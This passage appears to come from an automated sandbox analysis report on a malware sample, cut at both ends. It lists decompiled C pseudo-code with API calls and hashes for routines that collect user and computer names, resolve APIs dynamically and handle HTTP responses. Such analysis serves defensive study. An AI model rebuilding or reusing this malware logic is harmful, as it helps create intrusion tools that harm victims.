            • wsprintfA.USER32 ref: 007E2C34
            • wsprintfA.USER32 ref: 007E2C5B
            • wsprintfA.USER32 ref: 007E2C7C
            • wsprintfA.USER32 ref: 007E2CA7
            • HeapFree.KERNEL32(00000000,?), ref: 007E2CBA
            • wsprintfA.USER32 ref: 007E2CD9
            • HeapFree.KERNEL32(00000000,?), ref: 007E2CEA
              • Part of subcall function 007E6B59: RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E6B75
              • Part of subcall function 007E6B59: RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E6B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007E2D19
            • GetTickCount.KERNEL32 ref: 007E2D2B
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E2D3F
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E2D5D
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A0
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A8
              • Part of subcall function 007E6675: strcpy.NTDLL ref: 007E66BF
              • Part of subcall function 007E6675: lstrcat.KERNEL32(00000000,00000000), ref: 007E66CA
              • Part of subcall function 007E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66E7
            • StrTrimA.SHLWAPI(00000000,007E9280,?,02F19600), ref: 007E2D8F
              • Part of subcall function 007E7563: lstrlen.KERNEL32(02F19C38,00000000,00000000,00000000,007E3EF9,00000000), ref: 007E7573
              • Part of subcall function 007E7563: lstrlen.KERNEL32(?), ref: 007E757B
              • Part of subcall function 007E7563: lstrcpy.KERNEL32(00000000,02F19C38), ref: 007E758F
              • Part of subcall function 007E7563: lstrcat.KERNEL32(00000000,?), ref: 007E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 007E2DB2
            • lstrcpy.KERNEL32(?,?), ref: 007E2DBC
            • lstrcat.KERNEL32(?,?), ref: 007E2DCC
            • lstrcat.KERNEL32(?,00000000), ref: 007E2DD3
              • Part of subcall function 007E6536: lstrlen.KERNEL32(?,00000000,02F19E40,00000000,007E6F0A,02F1A063,43175AC3,?,?,?,?,43175AC3,00000005,007EA00C,4D283A53,?), ref: 007E653D
              • Part of subcall function 007E6536: mbstowcs.NTDLL ref: 007E6566
              • Part of subcall function 007E6536: memset.NTDLL ref: 007E6578
            • wcstombs.NTDLL ref: 007E2E76
              • Part of subcall function 007E597D: SysAllocString.OLEAUT32(?), ref: 007E59B8
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • HeapFree.KERNEL32(00000000,?), ref: 007E2EBF
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007E2ECB
            • HeapFree.KERNEL32(00000000,?,?,02F19600), ref: 007E2ED8
            • HeapFree.KERNEL32(00000000,?), ref: 007E2EE5
            • HeapFree.KERNEL32(00000000,?), ref: 007E2EEF
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
            • String ID:
            • API String ID: 1185349883-0
            • Opcode ID: 4115561a96a62950792ff5cccd2910c7cf011bde42a5e6efe6dea6babc42ff23
            • Instruction ID: c4cee89f22aeb0b8c94451ac21f2a42925a0a5e7189a61f852da79187edf66dd
            • Opcode Fuzzy Hash: 4115561a96a62950792ff5cccd2910c7cf011bde42a5e6efe6dea6babc42ff23
            • Instruction Fuzzy Hash: A0A19972502290EFC711EB65DC88E6A7BE8FF8C344F054928F549DB221D739E846CB66
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E007E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t58;
            				signed int _t60;
            				signed int _t62;
            				intOrPtr _t64;
            				intOrPtr _t66;
            				intOrPtr _t70;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            				intOrPtr _t80;
            				WCHAR* _t83;
            				void* _t84;
            				void* _t85;
            				void* _t86;
            				intOrPtr _t92;
            				intOrPtr* _t102;
            				signed int _t103;
            				void* _t104;
            				intOrPtr _t105;
            				void* _t107;
            				intOrPtr* _t115;
            				void* _t119;
            				intOrPtr _t125;
            
            				_t58 =  *0x7ea3dc; // 0x2f19ce8
            				_v24 = _t58;
            				_v28 = 8;
            				_v20 = GetTickCount();
            				_t60 = E007E6ABD();
            				_t103 = 5;
            				_t98 = _t60 % _t103 + 6;
            				_t62 = E007E6ABD();
            				_t117 = _t62 % _t103 + 6;
            				_v32 = _t62 % _t103 + 6;
            				_t64 = E007E42E9(_t60 % _t103 + 6);
            				_v16 = _t64;
            				if(_t64 != 0) {
            					_t66 = E007E42E9(_t117);
            					_v12 = _t66;
            					if(_t66 != 0) {
            						_push(5);
            						_t104 = 0xa;
            						_t119 = E007E398D(_t104,  &_v20);
            						if(_t119 == 0) {
            							_t119 = 0x7e918c;
            						}
            						_t70 = E007E5FA1(_v24);
            						_v8 = _t70;
            						if(_t70 != 0) {
            							_t115 = __imp__;
            							_t72 =  *_t115(_t119);
            							_t75 =  *_t115(_v8);
            							_t76 =  *_t115(_a4);
            							_t80 = E007E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
            							_v24 = _t80;
            							if(_t80 != 0) {
            								_t105 =  *0x7ea348; // 0x272d5a8
            								_t102 =  *0x7ea138; // 0x7e7ddd
            								_t28 = _t105 + 0x7ebd10; // 0x530025
            								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
            								_push(4);
            								_t107 = 5;
            								_t83 = E007E398D(_t107,  &_v20);
            								_a8 = _t83;
            								if(_t83 == 0) {
            									_a8 = 0x7e9190;
            								}
            								_t84 =  *_t115(_a8);
            								_t85 =  *_t115(_v8);
            								_t86 =  *_t115(_a4);
            								_t125 = E007E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
            								if(_t125 == 0) {
            									E007E61DA(_v24);
            								} else {
            									_t92 =  *0x7ea348; // 0x272d5a8
            									_t44 = _t92 + 0x7eba20; // 0x73006d
            									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
            									 *_a16 = _v24;
            									_v28 = _v28 & 0x00000000;
            									 *_a20 = _t125;
            								}
            							}
            							E007E61DA(_v8);
            						}
            						E007E61DA(_v12);
            					}
            					E007E61DA(_v16);
            				}
            				return _v28;
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 007E7250
            • lstrlen.KERNEL32(00000000,00000005), ref: 007E72D1
            • lstrlen.KERNEL32(?), ref: 007E72E2
            • lstrlen.KERNEL32(00000000), ref: 007E72E9
            • lstrlenW.KERNEL32(80000002), ref: 007E72F0
            • lstrlen.KERNEL32(?,00000004), ref: 007E7359
            • lstrlen.KERNEL32(?), ref: 007E7362
            • lstrlen.KERNEL32(?), ref: 007E7369
            • lstrlenW.KERNEL32(?), ref: 007E7370
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlen$CountFreeHeapTick
            • String ID:
            • API String ID: 2535036572-0
            • Opcode ID: 2a4fb85bfb9fbb9928296ab74ae4be2de58f15a000fbd0fae272175c7924b62e
            • Instruction ID: 99b4dce1e22a14fdb21ab99aacd3f74365547a016b70790522c9f61393f12daa
            • Opcode Fuzzy Hash: 2a4fb85bfb9fbb9928296ab74ae4be2de58f15a000fbd0fae272175c7924b62e
            • Instruction Fuzzy Hash: D6518332D0119AEBCF12AFA6CC49DDE7BB5EF48314F058025FA04AB211D739DA11DB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E007E37DF(void* __eax, void* __ecx) {
            				long _v8;
            				char _v12;
            				void* _v16;
            				void* _v28;
            				long _v32;
            				void _v104;
            				char _v108;
            				long _t36;
            				intOrPtr _t40;
            				intOrPtr _t47;
            				intOrPtr _t50;
            				void* _t58;
            				void* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t71;
            
            				_t1 = __eax + 0x14; // 0x74183966
            				_t69 =  *_t1;
            				_t36 = E007E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
            				_v8 = _t36;
            				if(_t36 != 0) {
            					L12:
            					return _v8;
            				}
            				E007E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
            				_t40 = _v12(_v12);
            				_v8 = _t40;
            				if(_t40 == 0 && ( *0x7ea300 & 0x00000001) != 0) {
            					_v32 = 0;
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					_v108 = 0;
            					memset( &_v104, 0, 0x40);
            					_t47 =  *0x7ea348; // 0x272d5a8
            					_t18 = _t47 + 0x7eb706; // 0x73797325
            					_t68 = E007E127E(_t18);
            					if(_t68 == 0) {
            						_v8 = 8;
            					} else {
            						_t50 =  *0x7ea348; // 0x272d5a8
            						_t19 = _t50 + 0x7eb86c; // 0x2f18e14
            						_t20 = _t50 + 0x7eb3f6; // 0x4e52454b
            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
            						if(_t71 == 0) {
            							_v8 = 0x7f;
            						} else {
            							_v108 = 0x44;
            							E007E5B56();
            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
            							_push(1);
            							E007E5B56();
            							if(_t58 == 0) {
            								_v8 = GetLastError();
            							} else {
            								CloseHandle(_v28);
            								CloseHandle(_v32);
            							}
            						}
            						HeapFree( *0x7ea2d8, 0, _t68);
            					}
            				}
            				_t70 = _v16;
            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
            				E007E61DA(_t70);
            				goto L12;
            			}

            APIs
              • Part of subcall function 007E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,007E37FB,?,?,?,?,00000000,00000000), ref: 007E6C1E
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 007E6C40
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 007E6C56
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007E6C6C
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007E6C82
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007E6C98
            • memset.NTDLL ref: 007E3849
              • Part of subcall function 007E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,007E3862,73797325), ref: 007E128F
              • Part of subcall function 007E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007E12A9
            • GetModuleHandleA.KERNEL32(4E52454B,02F18E14,73797325), ref: 007E387F
            • GetProcAddress.KERNEL32(00000000), ref: 007E3886
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E38EE
              • Part of subcall function 007E5B56: GetProcAddress.KERNEL32(36776F57,007E2425), ref: 007E5B71
            • CloseHandle.KERNEL32(00000000,00000001), ref: 007E38CB
            • CloseHandle.KERNEL32(?), ref: 007E38D0
            • GetLastError.KERNEL32(00000001), ref: 007E38D4
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
            • String ID:
            • API String ID: 3075724336-0
            • Opcode ID: 67829efb4ad5f35d8821c5489239a4579220fc539459c880a1bf23b6ea96d8c6
            • Instruction ID: 98bc54e5fc3ac56427c850a2bbb690521b1f9b245ac1127db15dac3078ab9194
            • Opcode Fuzzy Hash: 67829efb4ad5f35d8821c5489239a4579220fc539459c880a1bf23b6ea96d8c6
            • Instruction Fuzzy Hash: 1D313EB2901289FFDB10AFA5DC89D9EBBBCEB0C344F104565F606A7121D738AE44DB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E3FA5(void* __ecx, void* __esi) {
            				long _v8;
            				long _v12;
            				long _v16;
            				long _v20;
            				long _t34;
            				long _t39;
            				long _t42;
            				long _t56;
            				void* _t58;
            				void* _t59;
            				void* _t61;
            
            				_t61 = __esi;
            				_t59 = __ecx;
            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
            				do {
            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
            					_v20 = _t34;
            					if(_t34 != 0) {
            						L3:
            						_v8 = 4;
            						_v16 = 0;
            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
            							_t39 = GetLastError();
            							_v12 = _t39;
            							if(_v20 == 0 || _t39 != 0x2ef3) {
            								L15:
            								return _v12;
            							} else {
            								goto L11;
            							}
            						}
            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
            							goto L11;
            						} else {
            							_v16 = 0;
            							_v8 = 0;
            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
            							_t58 = E007E33DC(_v8 + 1);
            							if(_t58 == 0) {
            								_v12 = 8;
            							} else {
            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
            									E007E61DA(_t58);
            									_v12 = GetLastError();
            								} else {
            									 *((char*)(_t58 + _v8)) = 0;
            									 *(_t61 + 0xc) = _t58;
            								}
            							}
            							goto L15;
            						}
            					}
            					SetEvent( *(_t61 + 0x1c));
            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
            					_v12 = _t56;
            					if(_t56 != 0) {
            						goto L15;
            					}
            					goto L3;
            					L11:
            					_t42 = E007E16B2( *(_t61 + 0x1c), _t59, 0xea60);
            					_v12 = _t42;
            				} while (_t42 == 0);
            				goto L15;
            			}

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 007E3FBC
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?), ref: 007E3FCC
            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 007E3FFE
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 007E4023
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 007E4043
            • GetLastError.KERNEL32 ref: 007E4055
              • Part of subcall function 007E16B2: WaitForMultipleObjects.KERNEL32(00000002,007E7C47,00000000,007E7C47,?,?,?,007E7C47,0000EA60), ref: 007E16CD
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • GetLastError.KERNEL32(00000000), ref: 007E408A
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID:
            • API String ID: 3369646462-0
            • Opcode ID: 319c4360991fd5d5381f72ef35efb0cec235ba4b182298889f4fa90012b0ee71
            • Instruction ID: cd32cb3de9d2b33a0b1b338b5ffa7a6441be68a4849fe0743e59becbe5861332
            • Opcode Fuzzy Hash: 319c4360991fd5d5381f72ef35efb0cec235ba4b182298889f4fa90012b0ee71
            • Instruction Fuzzy Hash: 16311CB5D01389EFDB20DFA6CC8499EBBB8EB4C300F1049B9E702A6151D779AA449F50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 007E3ABD
            • SysAllocString.OLEAUT32(0070006F), ref: 007E3AD1
            • SysAllocString.OLEAUT32(00000000), ref: 007E3AE3
            • SysFreeString.OLEAUT32(00000000), ref: 007E3B4B
            • SysFreeString.OLEAUT32(00000000), ref: 007E3B5A
            • SysFreeString.OLEAUT32(00000000), ref: 007E3B65
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 5e6ceffe5572ebd5dfcd5f578137accd954393b51287fd38986cb42292500fe1
            • Instruction ID: 9ccb973c6f9d16ac4498b0589d339262cb79f70b8c05e1673e3ba001718a9280
            • Opcode Fuzzy Hash: 5e6ceffe5572ebd5dfcd5f578137accd954393b51287fd38986cb42292500fe1
            • Instruction Fuzzy Hash: AE419F76D01649ABDF01DFBDC848A9EB7BAEF49300F108466EA11EB120DA75DE05CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
            				intOrPtr _v8;
            				intOrPtr _t23;
            				intOrPtr _t26;
            				_Unknown_base(*)()* _t28;
            				intOrPtr _t30;
            				_Unknown_base(*)()* _t32;
            				intOrPtr _t33;
            				_Unknown_base(*)()* _t35;
            				intOrPtr _t36;
            				_Unknown_base(*)()* _t38;
            				intOrPtr _t39;
            				_Unknown_base(*)()* _t41;
            				intOrPtr _t44;
            				struct HINSTANCE__* _t48;
            				intOrPtr _t54;
            
            				_t54 = E007E33DC(0x20);
            				if(_t54 == 0) {
            					_v8 = 8;
            				} else {
            					_t23 =  *0x7ea348; // 0x272d5a8
            					_t1 = _t23 + 0x7eb436; // 0x4c44544e
            					_t48 = GetModuleHandleA(_t1);
            					_t26 =  *0x7ea348; // 0x272d5a8
            					_t2 = _t26 + 0x7eb85c; // 0x7243775a
            					_v8 = 0x7f;
            					_t28 = GetProcAddress(_t48, _t2);
            					 *(_t54 + 0xc) = _t28;
            					if(_t28 == 0) {
            						L8:
            						E007E61DA(_t54);
            					} else {
            						_t30 =  *0x7ea348; // 0x272d5a8
            						_t5 = _t30 + 0x7eb849; // 0x614d775a
            						_t32 = GetProcAddress(_t48, _t5);
            						 *(_t54 + 0x10) = _t32;
            						if(_t32 == 0) {
            							goto L8;
            						} else {
            							_t33 =  *0x7ea348; // 0x272d5a8
            							_t7 = _t33 + 0x7eb72b; // 0x6e55775a
            							_t35 = GetProcAddress(_t48, _t7);
            							 *(_t54 + 0x14) = _t35;
            							if(_t35 == 0) {
            								goto L8;
            							} else {
            								_t36 =  *0x7ea348; // 0x272d5a8
            								_t9 = _t36 + 0x7eb883; // 0x4e6c7452
            								_t38 = GetProcAddress(_t48, _t9);
            								 *(_t54 + 0x18) = _t38;
            								if(_t38 == 0) {
            									goto L8;
            								} else {
            									_t39 =  *0x7ea348; // 0x272d5a8
            									_t11 = _t39 + 0x7eb87b; // 0x6c43775a
            									_t41 = GetProcAddress(_t48, _t11);
            									 *(_t54 + 0x1c) = _t41;
            									if(_t41 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t54 + 4)) = _a4;
            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
            										_t44 = E007E7A08(_t54, _a8);
            										_v8 = _t44;
            										if(_t44 != 0) {
            											goto L8;
            										} else {
            											 *_a12 = _t54;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}

            APIs
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,007E37FB,?,?,?,?,00000000,00000000), ref: 007E6C1E
            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 007E6C40
            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 007E6C56
            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007E6C6C
            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007E6C82
            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007E6C98
              • Part of subcall function 007E7A08: memset.NTDLL ref: 007E7A87
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateHandleHeapModulememset
            • String ID:
            • API String ID: 1886625739-0
            • Opcode ID: 69174d3615b23cd64e6f128ee78b661800127f2160f972c41148052cc468eac8
            • Instruction ID: e770b552cf830dc0ea7a75536ccef518fc38cf75710369cdfb08fd28a8e26831
            • Opcode Fuzzy Hash: 69174d3615b23cd64e6f128ee78b661800127f2160f972c41148052cc468eac8
            • Instruction Fuzzy Hash: 72214DB160278AAFD710DF6ACD84E6ABBECEB1C3407104565E545CB221E77CE908CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E1340() {
            				long _v8;
            				long _v12;
            				int _v16;
            				long _t39;
            				long _t43;
            				signed int _t47;
            				short _t51;
            				signed int _t52;
            				int _t56;
            				int _t57;
            				char* _t64;
            				short* _t67;
            
            				_v16 = 0;
            				_v8 = 0;
            				GetUserNameW(0,  &_v8);
            				_t39 = _v8;
            				if(_t39 != 0) {
            					_v12 = _t39;
            					_v8 = 0;
            					GetComputerNameW(0,  &_v8);
            					_t43 = _v8;
            					if(_t43 != 0) {
            						_t11 = _t43 + 2; // 0x7491c742
            						_v12 = _v12 + _t11;
            						_t64 = E007E33DC(_v12 + _t11 << 2);
            						if(_t64 != 0) {
            							_t47 = _v12;
            							_t67 = _t64 + _t47 * 2;
            							_v8 = _t47;
            							if(GetUserNameW(_t67,  &_v8) == 0) {
            								L7:
            								E007E61DA(_t64);
            							} else {
            								_t51 = 0x40;
            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
            								_t52 = _v8;
            								_v12 = _v12 - _t52;
            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
            									goto L7;
            								} else {
            									_t56 = _v12 + _v8;
            									_t31 = _t56 + 2; // 0x7e3e01
            									_v12 = _t56;
            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
            									_v8 = _t57;
            									if(_t57 == 0) {
            										goto L7;
            									} else {
            										_t64[_t57] = 0;
            										_v16 = _t64;
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v16;
            			}

            APIs
            • GetUserNameW.ADVAPI32(00000000,007E3DFF), ref: 007E1354
            • GetComputerNameW.KERNEL32(00000000,007E3DFF), ref: 007E1370
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetUserNameW.ADVAPI32(00000000,007E3DFF), ref: 007E13AA
            • GetComputerNameW.KERNEL32(007E3DFF,7491C740), ref: 007E13CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,007E3DFF,00000000,007E3E01,00000000,00000000,?,7491C740,007E3DFF), ref: 007E13F0
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID:
            • API String ID: 3850880919-0
            • Opcode ID: 35af9f6a86b64b12ebd07ebe699142152ccc52a774747fb44ce7f241cd5722f3
            • Instruction ID: 9b3d355368f4ac240a7389a55ff3ff2630dfa6e276cf00fbf3d223ae2e327c35
            • Opcode Fuzzy Hash: 35af9f6a86b64b12ebd07ebe699142152ccc52a774747fb44ce7f241cd5722f3
            • Instruction Fuzzy Hash: 8A210AB6901188FFCB11DFE6C985CEEBBB8EF48304B5044AAE501E7240DB34AB45DB25
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0078167F,0000000A,?,?), ref: 00781824
            • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 00781884
            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0078167F,0000000A), ref: 007818AF
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0078167F,0000000A,?,?), ref: 007818D0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0078167F,0000000A,?,?), ref: 007818D8
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
            • String ID:
            • API String ID: 2685682793-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: 21ab0d429037ccb12cd0b497fd0edb0e0b958b20af2803eb9db7002a8ab51c0f
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 9921A7B2A40208BFD710BFA4DC89EAE7BBDEB443A1F514135FA05E7190D6349D46CB64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E54D8(intOrPtr _a4) {
